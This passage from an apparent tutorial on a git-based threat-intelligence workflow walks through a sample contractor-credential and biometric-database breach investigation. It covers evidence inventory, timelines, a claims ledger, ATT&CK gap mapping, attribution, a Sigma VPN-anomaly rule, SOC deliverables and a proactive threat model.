intake, create the project folder and commit the intake document into it:</p><pre># Choose the template matching your mode<br>cp -r CTI_as_a_Code/templates/reactive/   investigations/myorg-incident-2025-03/<br>cd investigations/myorg-incident-2025-03/<br>git init<br>git add .<br>git commit -m "PROJ-001: scaffold initialized"<br># Copy your intake notes into the project<br>cp /path/to/intake-notes.md 00-scope/intake.md<br>git add 00-scope/intake.md<br>git commit -m "PROJ-001: intake complete - initial hypothesis: AiTM contractor credential theft"</pre><p>The intake document becomes the first record in the investigation’s git history. Every subsequent commit builds on it. When the investigation is reviewed three months later, the git log shows what was known when, and what the analyst’s reasoning was at each stage.</p><h3>Step 3: Scope the Project</h3><p><strong>File:</strong> 00-scope/scope.md | <strong>Role:</strong> Team Lead | <strong>Time:</strong> 30 min</p><p>The scope document translates the intake into a formal project definition. It is signed off by the stakeholder before analysis begins. Scope changes during the investigation require a new commit with explicit justification — this prevents scope creep and keeps the git history honest.</p><pre># Scope — PROJ-001 — MyOrg Incident 2025-03<br>Signed off by: CISO (Rachel K.) | Date: 2025-03-18 09:00 IST<br>## In scope<br>- Systems: HOST-01, HOST-02, vpn-gw-01, db-01<br>- Time range: 2025-03-15 00:00 IST - 2025-03-18 23:59 IST<br>- Evidence: Winlogbeat JSONL, VPN gateway logs, DB audit log, netflow<br>## Out of scope<br>- Cloud infrastructure - separate authorization required; pending CISO approval<br>- Employee endpoints outside the affected /24 subnet<br>## PIRs (Priority Intelligence Requirements)<br>These are the specific questions this investigation must answer. Analysis is complete<br>when all PIRs have an assessed answer or are explicitly closed as unanswerable.<br>- PIR-001: Did the adversary access or exfiltrate biometric records from db-01?<br>- PIR-002: What was the initial access vector - how did they get in?<br>- PIR-003: Is there any indication of ongoing access or persistence as of 2025-03-18?<br>## Stakeholders<br>- Commissioned by: CISO<br>- Deliverables to: CISO, IR Lead, Legal<br>- Scope change authority: CISO only - any scope expansion requires written approval<br>## Evidence handling<br>- TLP: AMBER - share with CERT-IL only with explicit CISO approval<br>- Legal hold on all artifacts pending INCD notification decision - do not delete anything<br>- Do not access db-01 production environment directly - use log copies only</pre><p>Commit and get written sign-off (Slack, email, or a note in the case):</p><pre>git add 00-scope/<br>git commit -m "PROJ-001: scope signed off by CISO — PIR-001 through PIR-003, TLP AMBER, legal hold"</pre><h3>Reactive Mode: Full Walkthrough</h3><h3>Step R1: Collect and Inventory Evidence</h3><p><strong>File:</strong> 01-evidence/README.md | <strong>Time:</strong> 2–8 h depending on evidence volume</p><p>Before any analysis, build the complete evidence inventory. The rule: <strong>you do not analyze what you have not inventoried.</strong> Working from untracked evidence is how findings get missed and how the chain of custody breaks.</p><p><strong>Collection with Velociraptor (remote, no reboot required):</strong></p><pre># Collect Windows Security event log from HOST-01<br>velociraptor -v artifacts collect Windows.EventLogs.Evtx \<br>  --args EventLog=Security \<br>  --output HOST-01-security.jsonl<br><br># Collect Sysmon (process creation, network, file events)<br>velociraptor -v artifacts collect Windows.EventLogs.Evtx \<br>  --args EventLog="Microsoft-Windows-Sysmon/Operational" \<br>  --output HOST-01-sysmon.jsonl<br><br># Collect PowerShell script block logging<br>velociraptor -v artifacts collect Windows.EventLogs.Evtx \<br>  --args EventLog="Microsoft-Windows-PowerShell/Operational" \<br>  --output HOST-01-powershell.jsonl</pre><p><strong>Hash all collected evidence immediately:</strong></p><pre>sha256sum HOST-01-security.jsonl HOST-01-sysmon.jsonl vpn-gw-2025-03-17.jsonl \<br>  &gt; evidence-checksums.sha256<br>git add evidence-checksums.sha256<br>git commit -m "PROJ-001: evidence checksums - chain of custody established"</pre><p><strong>Build the inventory table:</strong></p><pre>| Source | File | Systems | Time Range | Gap | SHA256 | Usability |<br>|---|---|---|---|---|---|---|<br>| Windows Security log | HOST-01-security.jsonl | HOST-01 | 2025-03-15 – 2025-03-18 | None | a3f1... | High |<br>| Sysmon | HOST-01-sysmon.jsonl | HOST-01 | 2025-03-15 – 2025-03-18 | GAP-001: 03:00–07:00 IST on 03-17 | b2e4... | High (with gap) |<br>| VPN gateway | vpn-gw-2025-03-17.jsonl | vpn-gw-01 | 2025-03-17 only | None | c9d7... | High |<br>| DB audit log | vrid-audit-2025-03-17.jsonl | db-01 | 2025-03-17 00:00–06:00 | Post-06:00 log rotation lost | d4a2... | Medium |<br>| Netflow | govnet-ops-2025-03-17.jsonl | All | 2025-03-17 | None | e8b3... | High |</pre><p><strong>Document every gap explicitly:</strong></p><pre>## GAP-001 — HOST-01 Sysmon | 2025-03-17 03:00–07:00 IST<br>Missing event types: process creation (EID 1), network connections (EID 3), file creation (EID 11)<br>Duration: 4 hours<br>Root cause: Sysmon service crash; restart at 07:02 confirmed in System log<br>What does cover this window: Security log (EID 4624, 4688 partial) - some process activity visible<br>Confidence impact: T1059, T1055, T1136, T1543 activity during this window CANNOT be confirmed<br>  or ruled out. Any claim about adversary actions between 03:00–07:00 must be labeled HYPOTHESIZED<br>  unless supported by netflow or DB audit log.</pre><p><strong>Normalize to super-timeline with Plaso:</strong></p><pre>log2timeline.py --storage-file PROJ-001.plaso \<br>  HOST-01-security.jsonl \<br>  HOST-01-sysmon.jsonl \<br>  vpn-gw-2025-03-17.jsonl \<br>  vrid-audit-2025-03-17.jsonl \<br>  govnet-ops-2025-03-17.jsonl<br><br>psort.py -o l2tcsv PROJ-001.plaso \<br>  --slice "2025-03-17T00:00:00" \<br>  --slice_size 1440 \<br>  &gt; supertimeline-2025-03-17.csv</pre><p><strong>Rapid Sigma triage with Hayabusa before Timesketch setup:</strong></p><pre>hayabusa csv-timeline \<br>  --directory ./evtx/ \<br>  --output hayabusa-triage.csv \<br>  --profile verbose \<br>  --min-level medium<br><br># Sort by severity to find high-confidence hits first<br>sort -t',' -k5 -r hayabusa-triage.csv | head -50<br><br>git add 01-evidence/<br>git commit -m "PROJ-001: evidence inventory - 5 sources, GAP-001 documented (4h Sysmon outage on 03-17)"</pre><h3>Step R2: Build the Timeline with Evidence Labels</h3><p><strong>File:</strong> 03-analysis/timeline/timeline.md | <strong>Time:</strong> 4–20 h</p><p>The timeline is a chronological log of every relevant event with three things that most timelines omit: <strong>evidence citations, evidence labels, and ATT&amp;CK technique mappings</strong>.</p><p><strong>Evidence label system — every event gets one:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nig_2_h62AbfTNhj8HVnQQ.png"></figure><p><strong>Why labels matter:</strong> Without them, analysts conflate what they saw with what they inferred. The label forces explicit acknowledgment of how strong each piece of evidence is. When an executive asks “are you sure they took the data?”, the answer is “CONFIRMED — two independent sources (DB audit log and netflow) both show 892 MB outbound” not “we think so.”</p><p><strong>Example timeline entries:</strong></p><pre>## 2025-03-17 02:09:41 IST | CORROBORATED | T1566.001<br>Email gateway: message delivered to contractor-07@myorg.il from spoofed.vendor@mailpro[.]cc<br>Attachment: Q1-Invoice-2025.docx (SHA256: 4a7f...)<br>Single source — email gateway log only; no AV alert (attachment not flagged at delivery)<br>Note: This is the suspected initial delivery. No click/open event confirmed yet.<br><br>## 2025-03-17 02:14:23 IST | CONFIRMED | T1078.001<br>VPN gateway: authentication from 185.234.x.x, UserID: contractor-07<br>Source 1: vpn-gw-2025-03-17.jsonl line 4,471 - SessionID: VPN-20250317-8821<br>Source 2: RADIUS auth log - same SessionID, same source IP, same timestamp ±2s<br>No prior VPN session history for contractor-07 from this IP. HR confirmed contractor-07<br>was not working on 2025-03-17. Two independent sources → CONFIRMED.<br>PIR-002 status: partial answer - likely credential theft prior to this event<br>## 2025-03-17 02:17–02:44 IST | INFERRED | T1021.001<br>Adversary likely moved laterally from contractor jump host to db-01 during this window.<br>Inference basis: VPN session established at 02:14 (CONFIRMED); DB access at 02:47 (CONFIRMED);<br>no direct evidence of the lateral movement path - jump host Sysmon logs not available.<br>This step is inferred from the 30-minute gap between VPN auth and DB access.<br>Cannot confirm the specific technique (RDP, SMB, other) without jump host logs.<br>## 2025-03-17 02:47:11 IST | CONFIRMED | T1048.003<br>DB audit log: SELECT * on biometric_records from 185.234.x.x<br>Source 1: vrid-audit-2025-03-17.jsonl line 892 - full-table SELECT, 340,218 rows<br>Source 2: netflow - 892.4 MB outbound from db-01 to 185.234.x.x at 02:47:11–02:51:33<br>PIR-001 status: ANSWERED YES - biometric records accessed and exfiltrated<br>## 2025-03-17 03:00–07:00 IST | GAP (GAP-001)<br>Sysmon coverage lost. Security log partial. Cannot confirm or rule out:<br>- T1059.001/003 (command execution)<br>- T1136 (account creation / persistence)<br>- T1105 (tool staging)<br>See GAP-001 in evidence inventory for impact assessment.</pre><h3>Step R3: Claims Ledger</h3><p><strong>File:</strong> 03-analysis/claims/claims-ledger.md | <strong>Time:</strong> 1–2 h</p><p>The claims ledger is the single most important document in the investigation. It is what transforms a timeline narrative into structured, auditable analysis.</p><p><strong>Every row answers five questions:</strong></p><ol><li>What is the specific assertion? (One sentence, falsifiable)</li><li>What evidence supports it? (File path and line number)</li><li>How confident are we? (High / Medium / Low with rationale)</li><li>What alternative explanations were considered? (And why were they ruled out or left open)</li><li>Which PIR does this answer?</li></ol><pre>| ID | Claim | Evidence | Confidence | Competing Hypotheses | PIR |<br>|---|---|---|---|---|---|<br>| CL-001 | Adversary authenticated to the VPN using valid credentials for contractor-07 at 02:14 IST on 2025-03-17 | vpn-gw.jsonl:4471 + RADIUS log (same SessionID) | High | Legitimate login — ruled out: no prior session from this IP; contractor confirmed offline by HR; IP geolocates to Iranian hosting provider | PIR-002 |<br>| CL-002 | The biometric_records database was fully exfiltrated (340,218 rows, 892.4 MB) at 02:47–02:51 IST | db-audit.jsonl:892 (SELECT *) + netflow (892.4 MB from db-01 to 185.234.x.x) | High | Scheduled backup — ruled out: backup confirmed at 04:00; no authorized job at 02:47; db-admin confirmed no maintenance scheduled | PIR-001 |<br>| CL-003 | Initial credential theft was via AiTM phishing, not brute force or purchase | Session token replay pattern in VPN auth (no prior failed auths, immediate successful auth from new IP); email delivery confirmed 5 min before VPN auth | Medium | Credential purchase / insider — cannot fully rule out without forensic analysis of contractor-07 endpoint | PIR-002 |<br>| CL-004 | Persistence mechanism is unknown; cannot be determined | No log coverage during GAP-001 (03:00–07:00); no scheduled task, registry, or service evidence outside this window | Insufficient | Unknown — GAP-001 prevents assessment | PIR-003 |<br>| CL-005 | No confirmed evidence of access after 2025-03-17 07:02 IST (Sysmon restart) | All log sources show no activity from 185.234.x.x after 03:21 | Medium | Adversary using different infrastructure after initial exfil — cannot rule out; recommend threat hunt | PIR-003 |</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yONlPrE838ua7WNi6ho5Zg.png"></figure><p>The claims ledger drives everything downstream:</p><ul><li>Executive brief cites CL-IDs, not raw log lines</li><li>SOC handoff uses claims to justify IOC confidence</li><li>Attribution assessment cites claims as the evidence basis</li><li>Sigma rules reference which claim they would have detected</li></ul><pre>git add 03-analysis/claims/ 03-analysis/timeline/<br>git commit -m "PROJ-001: analysis — 16-event timeline, 5 claims; PIR-001 YES (CL-002), PIR-002 MEDIUM (CL-001/CL-003)"</pre><h3>Step R4: ATT&amp;CK Mapping with Gap Classification</h3><p><strong>File:</strong> 03-analysis/attck-mapping/attck-mapping.md | <strong>Time:</strong> 1–2 h</p><p>The ATT&amp;CK mapping has two purposes: documenting what happened (intelligence) and measuring detection coverage (operations). The <strong>Gap Type</strong> column is the operational output — it tells the SOC and engineering teams exactly what kind of work is needed for each missed technique.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rvDNkZD3SroVie2Jw28HgA.png"></figure><pre>| # | Tactic | Technique | Sub | Evidence | Confidence | Rule Fired? | Gap Type | Remediation |<br>|---|---|---|---|---|---|---|---|---|<br>| 1 | Initial Access | T1566.001 | — | Email gateway log | High | Partial | Coverage incomplete | Fix email gateway rule to extract attachment hash |<br>| 2 | Credential Access | T1557 | — | VPN timing pattern (CL-003) | Medium | No | Rule missing | Write Sigma rule DET-002; VPN logs are in SIEM |<br>| 3 | Initial Access | T1078.001 | — | VPN auth (CL-001) | High | No | Rule missing | Write Sigma rule DET-003 for anomalous VPN auth |<br>| 4 | Lateral Movement | T1021.001 | — | Inferred (CL-002 timing) | Low | Unknown | Data source missing | Jump host logs not ingested — engineering ticket |<br>| 5 | Collection/Exfil | T1048.003 | — | DB audit + netflow (CL-002) | High | No | Data source missing | DB audit log not in SIEM — Logstash pipeline needed |<br>| 6 | Impact (unknown) | Unknown | — | GAP-001 | — | Unknown | Architectural gap | Sysmon reliability improvement — separate track |</pre><p><strong>Gap taxonomy (each type requires different remediation):</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*J6GUO2cJkmFyqSUGMS2pdQ.png"></figure><p>Export the Navigator layer and commit it:</p><pre># In ATT&amp;CK Navigator: build your coverage layer (green=detected, yellow=partial, red=missed)<br># Export as JSON: Layer → Download as JSON<br># Save to: 03-analysis/attck-mapping/navigator-layer.json<br>git add 03-analysis/attck-mapping/<br>git commit -m "PROJ-001: ATT&amp;CK mapping - 6 techniques; 2 rule-missing, 2 data-source-missing, 1 incomplete, 1 arch-gap"</pre><p><strong>Decider — guided ATT&amp;CK mapping when the technique is unclear:</strong></p><p>When you observe a behavior but are not certain which ATT&amp;CK technique or sub-technique it maps to, <a href="https://github.com/cisagov/Decider">Decider</a> (CISA) walks you to the correct answer through a structured question tree. Instead of searching the ATT&amp;CK site manually, Decider asks what the adversary was trying to accomplish, then narrows to the correct tactic, technique, and sub-technique.</p><pre># Run Decider locally with Docker (one-time setup)<br>git clone https://github.com/cisagov/Decider.git<br>cd Decider<br>cp .env.docker .env<br># Edit .env — set DB_ADMIN_PASS, DB_KIOSK_PASS, CART_ENC_KEY, APP_ADMIN_PASS<br>cp -r default_config/. config/<br>sudo docker compose up<br># Visit http://localhost:8001</pre><p><strong>Workflow within Step R4:</strong></p><ol><li><strong>Question Tree</strong> — navigate Matrix → Tactic → Technique → Sub-technique by answering what the adversary did. Useful when the behavior is ambiguous (e.g., distinguishing T1059.001 from T1059.003 from an encoded command line, or deciding between T1078.001 and T1078.002 for a credential re-use event).</li><li><strong>Full Technique Search</strong> — boolean search with prefix-matching and stemming across all ATT&amp;CK descriptions. Faster than the ATT&amp;CK site when you have a partial technique name or keyword from a log line.</li><li><strong>Cart → Export</strong> — add confirmed techniques to the cart as you work through the mapping table. Export as a Navigator layer JSON (heatmap) or a formatted table for the attck-mapping.md file.</li></ol><p>Decider does not replace the ATT&amp;CK Navigator — it answers the “which technique is this?” question before you get to the Navigator layer. Use Decider to map, Navigator to visualize coverage.</p><p>Export the Navigator layer and commit it:</p><pre># In ATT&amp;CK Navigator: build your coverage layer (green=detected, yellow=partial, red=missed)<br># Export as JSON: Layer → Download as JSON<br># Save to: 03-analysis/attck-mapping/navigator-layer.json</pre><pre>git add 03-analysis/attck-mapping/<br>git commit -m "PROJ-001: ATT&amp;CK mapping - 6 techniques; 2 rule-missing, 2 data-source-missing, 1 incomplete, 1 arch-gap"</pre><h3>Step R5: Attribution Assessment</h3><p><strong>File:</strong> 03-analysis/attribution/attribution.md | <strong>Time:</strong> 1–2 h</p><p>Write the attribution section only after the claims ledger is complete. Attribution that precedes the evidence analysis is a hypothesis, not a conclusion. The sequence matters.</p><p><strong>The confidence ladder — use the correct language for the evidence you have:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rvLOfrTbbnV3ctLoJbzwbQ.png"></figure><p>Infrastructure pivoting for attribution — run from the C2 IP before enrichment ages:</p><pre># Passive DNS and co-hosting<br>curl "https://api.shodan.io/shodan/host/185.234.x.x?key=YOUR_KEY" | jq '.hostnames, .ports, .data[].banner'<br><br># VirusTotal for prior detection history and passive DNS<br># Certificate transparency - find co-hosted domains by SAN entries<br># MISP cross-correlation - does this IP appear in prior community events?<br>## Attribution Assessment - PROJ-001<br>### Evidence available<br>- AiTM credential interception via reverse proxy: consistent with CERT-IL CB-2025-041 actor profile<br>- C2 IP 185.234.x.x: passive DNS shows co-hosting with domains flagged in CERT-IL events<br>  CB-2025-039 and CB-2025-031 (confirmed via MISP cross-correlation)<br>- Tooling: cannot assess - no malware recovered due to GAP-001<br>- TTP overlap: T1557 + T1078.001 + T1048.003 consistent with cluster profile from CB-2025-041<br>### Confidence: Medium<br>Two data points (TTP overlap + infrastructure overlap with prior CERT-IL events) provide<br>corroborating evidence. Independent confirmation would require: (a) toolset match from<br>contractor-07 endpoint forensics, or (b) CERT-IL deconfliction confirming this IP in an<br>active track. Neither is currently available.<br>### Language for deliverables<br>"Activity assessed as consistent with the Iranian-nexus contractor-targeting cluster<br>documented in CERT-IL CB-2025-041 (medium confidence), based on AiTM tradecraft overlap<br>and C2 infrastructure observed in two prior CERT-IL-flagged events. Toolset confirmation<br>is not possible due to evidence gap GAP-001."</pre><h3>Step R6: Derive Sigma Rules for Every Missed Technique</h3><p><strong>Files:</strong> 04-detections/sigma/DET-NNN-name.yml | <strong>Time:</strong> 30–60 min per rule</p><p>For each “Rule missing” or “Coverage incomplete” entry in the ATT&amp;CK mapping, write a Sigma rule. The Sigma file references the investigation, the technique, and the validation result — creating a permanent link between intelligence and detection:</p><pre>title: Anomalous VPN Authentication — New Source IP for Known User<br>id: 7a3c9b1d-5678-4321-efab-9876543210cd<br>status: experimental<br>description: &gt;<br>  Detects a VPN authentication from a source IP with no prior history for the authenticating user.<br>  Consistent with AiTM credential replay (T1078.001 + T1557).<br>  Derived from PROJ-001 — initial access step, CL-001 (high confidence).<br>author: CTI Team — PROJ-001<br>date: 2025-03-19<br>logsource:<br>    category: network<br>    product: palo_alto_vpn        # adjust to your VPN product<br>detection:<br>    selection:<br>        event.action: vpn_auth_success<br>        user.name|exists: true<br>    filter_known:<br>        source.ip|cidr:<br>            - '10.0.0.0/8'         # corporate NAT ranges<br>            - '172.16.0.0/12'<br>    condition: selection and not filter_known<br>falsepositives:<br>    - VPN access from legitimate travel (new country/IP) — validate against HR travel records<br>    - New contractor onboarding from home IP — coordinate with IT<br>level: medium<br>tags:<br>    - attack.initial_access<br>    - attack.credential_access<br>    - attack.t1078.001<br>    - attack.t1557<br># PROJ-001: DET-003 | Gap: ATT&amp;CK row 3 (Rule missing)<br># Validated: PASS | 2025-03-19 | hayabusa against PROJ-001 evtx set</pre><p><strong>Validation before deployment:</strong></p><pre># Step 1: Confirm the rule fires on the known true-positive event in the incident evtx set<br>hayabusa csv-timeline \<br>  --directory ./evtx/ \<br>  --rules ./04-detections/sigma/DET-003-vpn-new-source-ip.yml \<br>  --output validate-DET-003.csv<br># Check the output includes the 02:14 event from contractor-07<br>grep "contractor-07" validate-DET-003.csv<br># Step 2: Convert to Elastic Lucene for deployment<br>pip install pySigma-backend-elasticsearch sigma-cli<br>sigma convert -t lucene -p ecs_windows \<br>  04-detections/sigma/DET-003-vpn-new-source-ip.yml<br># Step 3: Convert to ES|QL (alternative format for newer Elastic stacks)<br>sigma convert -t esql -p ecs_windows \<br>  04-detections/sigma/DET-003-vpn-new-source-ip.yml</pre><pre>git add 04-detections/<br>git commit -m "PROJ-001: detections — DET-001 through DET-004 written and validated PASS via Hayabusa"</pre><h3>Step R7: Produce Deliverables</h3><p><strong>Files:</strong> 05-deliverables/ | <strong>Time:</strong> 2–4 h</p><p><strong>Executive brief — maximum 1 page, no technical artifacts:</strong></p><pre># Incident Brief — PROJ-001 [TLP: AMBER]<br>2025-03-19 | For: CISO, IR Lead, Legal<br>## What happened<br>An assessed Iranian-nexus actor accessed the NDSA biometric records database on 2025-03-17<br>using stolen VPN credentials belonging to contractor-07, exfiltrating approximately 340,218<br>biometric records. Initial entry occurred at 02:14 IST; exfiltration completed by 02:51 IST.<br>## Business impact<br>INCD notification is required within 72 hours of discovery (deadline: 2025-03-20 02:14 IST).<br>Biometric Database Authority notification required under Section 12 of the Biometric Database Law.<br>No confirmed evidence of ongoing access as of investigation date.<br>## Key findings<br>- The adversary used valid contractor credentials obtained through suspected phishing - no brute<br>  force or technical exploit was required to enter the network<br>- The full biometric records table (340,218 records) was extracted in a single session lasting 4 minutes<br>- Three of five adversary techniques had no detection coverage at the time of the incident;<br>  none of the five triggered an alert<br>## What was not detected<br>The credential theft, the VPN login from an unrecognized IP, and the database exfiltration<br>all occurred without generating a single security alert. The incident was discovered through<br>a retrospective log review 36 hours after it concluded, not through real-time detection.<br>## Recommended actions<br>1. [IR Lead - by 18:00 today] Revoke and rotate all contractor VPN credentials<br>2. [CISO - by 02:14 IST 2025-03-20] File INCD notification using the PROJ-001 incident report<br>3. [SOC Lead - by end of week] Deploy detection rules DET-001 through DET-004 to Kibana; submit<br>   DB audit log pipeline to engineering as P0 ticket</pre><p><strong>SOC handoff contains the operational package — not narrative, only actionable data:</strong></p><pre># SOC Handoff — PROJ-001<br>## Current IOCs (valid as of 2025-03-19)<br>| Type | Value | Confidence | TTL | Action |<br>|---|---|---|---|---|<br>| IPv4 | 185.234.x.x | High | 30 days | Block at perimeter; alert on any new connections |<br>| Domain | spoofed.vendor@mailpro[.]cc | High | 30 days | Block at email gateway |<br>| SHA256 | 4a7f... (Q1-Invoice-2025.docx) | Medium | 90 days | Block at endpoint |<br>## Rules deployed / pending<br>| Rule ID | Status | CAB ticket | Covers |<br>|---|---|---|---|<br>| DET-001 | Deployed 2025-03-19 14:00 | CAB-2025-0341 | T1566.001 email delivery |<br>| DET-003 | Deployed 2025-03-19 14:00 | CAB-2025-0341 | T1078.001 anomalous VPN auth |<br>| DET-002 | Pending - blocked on VPN log pipeline | ENG-0234 | T1557 AiTM session replay |<br>| DET-004 | Pending - blocked on DB audit pipeline | ENG-0235 | T1048.003 DB exfiltration |<br>## Hunting queries (residual activity)<br>Hunt for additional sessions from the same ASN as 185.234.x.x in the 30 days before the incident.<br>Hunt for any contractor accounts that authenticated successfully from IPs with no prior history.<br>## Escalation criteria<br>Escalate immediately if:<br>- Any new connection from 185.234.x.x or the /24 subnet<br>- Any authentication from contractor-07 or other contractor accounts outside working hours<br>- Any new SELECT * queries against the biometric_records table</pre><h3>Proactive Mode: Full Walkthrough</h3><h3>Step P1: Copy the Template</h3><pre>cp -r CTI_as_a_Code/templates/proactive/ assessments/myorg-threat-model-2025-q2/<br>cd assessments/myorg-threat-model-2025-q2/<br>git init &amp;&amp; git add . &amp;&amp; git commit -m "PROJ-002: proactive scaffold initialized"</pre><p>Proactive template structure:</p><pre>proactive/<br>├── 00-scope/scope.md<br>├── 01-trigger-intelligence/<br>│   ├── trigger-assessment.md           ← summary across all triggers<br>│   └── triggers/<br>│       ├── TRG-001-cert-il-advisory.md<br>│       └── TRG-NNN-name.md             ← one file per trigger<br>├── 02-crown-jewels/<br>│   └── crown-jewels.md<br>├── 03-threat-model/<br>│   ├── attack-paths.md                 ← paths from entry to crown jewels<br>│   └── scenarios/<br>│       └── SCN-NNN-name.md             ← one per attack path<br>├── 04-detection-backlog/<br>│   └── detection-backlog.md<br>└── 07-deliverables/<br>    ├── executive-brief.md<br>    └── technical-brief.md</pre><h3>Step P2: Run the Intake</h3><p>Before you open any advisory or run any query, capture the commissioner’s requirements in a structured intake call.</p><p>→ <strong>Proactive Assessment — Intake</strong> — full intake form (trigger, crown jewels, detection posture, mandate, threat context, regulatory context), why each section matters, and how to commit the intake into the project git history.</p><h3>Step P3: Assess Trigger Intelligence</h3><p><strong>Files:</strong> 01-trigger-intelligence/triggers/TRG-NNN-name.md | <strong>Time:</strong> 2–4 h per trigger cycle</p><p>A trigger is an intelligence input that changes the threat assessment for this specific organization. Write one file per trigger:</p><pre># TRG-001 — CERT-IL CB-2025-041: AiTM Campaign Targeting Government Contractors<br>## What happened<br>CERT-IL advisory CB-2025-041 (2025-04-03) describes an active AiTM phishing campaign targeting<br>contractors with access to Israeli government identity and biometric systems. Three confirmed<br>victims in the municipal sector in March 2025. The adversary cluster replays intercepted session<br>tokens within 4–8 hours of interception.<br>## Source reliability<br>Source: CERT-IL - rating A (completely reliable; official government advisory from direct investigation)<br>Information: 1 (confirmed - CERT-IL investigated the victim cases directly)<br>Combined: High<br>## Relevance to THIS organization<br>- MyOrg operates contractor VPN with the same architecture described in CB-2025-041<br>- Contractor class accounts have direct read access to the biometric records database<br>- Two MyOrg contractors use the same IdP flagged in the advisory<br>- MyOrg's MFA is not enforced on VPN re-authentication for valid sessions - identical gap<br>## ATT&amp;CK techniques implied<br>- T1557 - AiTM session token interception<br>- T1078.001 - VPN authentication with stolen credentials<br>- T1048 - data exfiltration via authorized session (no alert triggered in victim cases)<br>## Detection action implied<br>PRIORITY: Verify whether VPN authentication logs are ingested into the SIEM.<br>If not - this is a P0 pipeline gap that blocks detection of the primary technique.<br>If yes - write AiTM detection rule immediately.<br>## Confidence<br>High - authoritative source, directly applicable to our architecture, confirmed active campaign.</pre><h3>Step P4: Crown Jewels Analysis</h3><p><strong>File:</strong> 02-crown-jewels/crown-jewels.md | <strong>Time:</strong> 2–4 h</p><p>Tier every asset by the business impact of compromise. Be specific — vague tier assignments produce vague threat models:</p><pre>## Tier 1 — Critical (compromise triggers regulatory notification or irreversible harm)<br>| Asset | System | Why Tier 1 | Notification trigger |<br>|---|---|---|---|<br>| Biometric records database | db-01 | 340K+ biometric records; Biometric Database Law §12 | Biometric Database Authority + INCD |<br>| Payment gateway | pay-gw-01 | PCI-DSS scope; real-time payment processing | BoI-CD 362 immediate notification |<br>| Active Directory | dc-01 | Domain takeover enables access to all Tier 1 systems | All downstream triggers |<br>| GovID authentication service | govid-svc-01 | National identity system; 2.1M citizen accounts | INCD mandatory notification |<br>## Tier 2 - High (enables attack on Tier 1)<br>| Asset | System | Attack path to Tier 1 |<br>|---|---|---|<br>| Contractor VPN gateway | vpn-gw-01 | Entry point; contractor accounts have db-01 read access |<br>| Contractor jump host | jump-01 | Pivot from DMZ to internal db-01 segment |<br>| Identity provider | idp-01 | Credential validation for all internal services |<br>| SIEM / logging infrastructure | siem-01 | Attacker visibility if compromised; evidence destruction risk |<br>## Tier 3 - Medium (operational impact, no regulatory trigger)<br>- Internal wikis and collaboration tools<br>- Development and staging environments (non-production data only)<br>- Monitoring dashboards<br><br>| Asset | System | Why Tier 1 | Notification trigger |<br>|---|---|---|---|<br>| Biometric records database | db-01 | 340K+ biometric records; Biometric Database Law §12 | Biometric Database Authority + INCD |<br>| Payment gateway | pay-gw-01 | PCI-DSS scope; real-time payment processing | BoI-CD 362 immediate notification |<br>| Active Directory | dc-01 | Domain takeover enables access to all Tier 1 systems | All downstream triggers |<br>| GovID authentication service | govid-svc-01 | National identity system; 2.1M citizen accounts | INCD mandatory notification |<br>## Tier 2 - High (enables attack on Tier 1)<br>| Asset | System | Attack path to Tier 1 |<br>|---|---|---|<br>| Contractor VPN gateway | vpn-gw-01 | Entry point; contractor accounts have db-01 read access |<br>| Contractor jump host | jump-01 | Pivot from DMZ to internal db-01 segment |<br>| Identity provider | idp-01 | Credential validation for all internal services |<br>| SIEM / logging infrastructure | siem-01 | Attacker visibility if compromised; evidence destruction risk |<br>## Tier 3 - Medium (operational impact, no regulatory trigger)<br>- Internal wikis and collaboration tools<br>- Development and staging environments (non-production data only)<br>- Monitoring dashboards</pre><h3>Step P5: Model Attack Scenarios</h3><p><strong>Files:</strong> 03-threat-model/scenarios/SCN-NNN-name.md | <strong>Time:</strong> 1–2 h per scenario</p><p>For each path from perimeter (or insider) to a Tier 1 asset, write a scenario. The scenario is not a story — it is a structured model that maps directly to detection tasks:</p><pre># SCN-001 — Contractor AiTM Phishing → Biometric Database Exfiltration<br>## Trigger basis<br>TRG-001 (CERT-IL CB-2025-041) - confirmed active campaign using this exact path<br>## Kill chain<br>| Step | Technique | Procedure | Current coverage |<br>|---|---|---|---|<br>| 1 | T1566.001 | Spearphishing link to spoofed VPN login page | Partial rule - browser-based phishing not covered |<br>| 2 | T1557 | AiTM proxy intercepts session token | No rule - VPN auth logs NOT in SIEM |<br>| 3 | T1078.001 | Token replay to VPN gateway | No rule - same pipeline gap |<br>| 4 | T1021.001 | RDP from jump host to db-01 | No rule - jump host Sysmon not collected |<br>| 5 | T1048.003 | Full-table SELECT; HTTPS exfil to C2 | No rule - DB audit log not in SIEM |<br>## Coverage verdict<br>0 of 5 techniques covered. All 5 require detection backlog entries.<br>3 of 5 are blocked by pipeline gaps (steps 2–4) - these require engineering work before rules can be written.<br>## Impact if scenario executes undetected<br>- 340K+ biometric records exfiltrated<br>- INCD and Biometric Database Authority notifications mandatory<br>- Estimated regulatory exposure: significant</pre><h3>Step P6: Build the Detection Backlog</h3><p><strong>File:</strong> 04-detection-backlog/detection-backlog.md | <strong>Time:</strong> 1–2 h</p><p>The detection backlog translates scenario analysis into sprint-ready engineering work. Every item has enough information to be picked up by a detection engineer without further context:</p><pre>| Pri | ID | Technique | Scenario | Pre-condition | Owner | Sprint | Status |<br>|---|---|---|---|---|---|---|---|<br>| P0 | ENG-001 | Pipeline | SCN-001 steps 2–3 | VPN auth logs must be ingested into SIEM before DET-B001/B002 can be written | Engineering | Sprint 1 | Blocked — pipeline |<br>| P0 | ENG-002 | Pipeline | SCN-001 step 5 | DB audit log must be ingested before DET-B003 | Engineering | Sprint 1 | Blocked — pipeline |<br>| P1 | DET-B001 | T1557 (AiTM) | SCN-001 step 2 | Requires ENG-001 | Detection | Sprint 2 | Waiting on ENG-001 |<br>| P1 | DET-B002 | T1078.001 | SCN-001 step 3 | Requires ENG-001 | Detection | Sprint 2 | Waiting on ENG-001 |<br>| P1 | DET-B003 | T1048.003 | SCN-001 step 5 | Requires ENG-002 | Detection | Sprint 2 | Waiting on ENG-002 |<br>| P2 | DET-B004 | T1021.001 | SCN-001 step 4 | Jump host Sysmon deployment needed | Detection | Sprint 3 | — |<br>| P2 | DET-B005 | T1566.001 | SCN-001 step 1 | Partial rule exists — needs browser phishing coverage added | Detection | Sprint 2 | Tuning existing rule 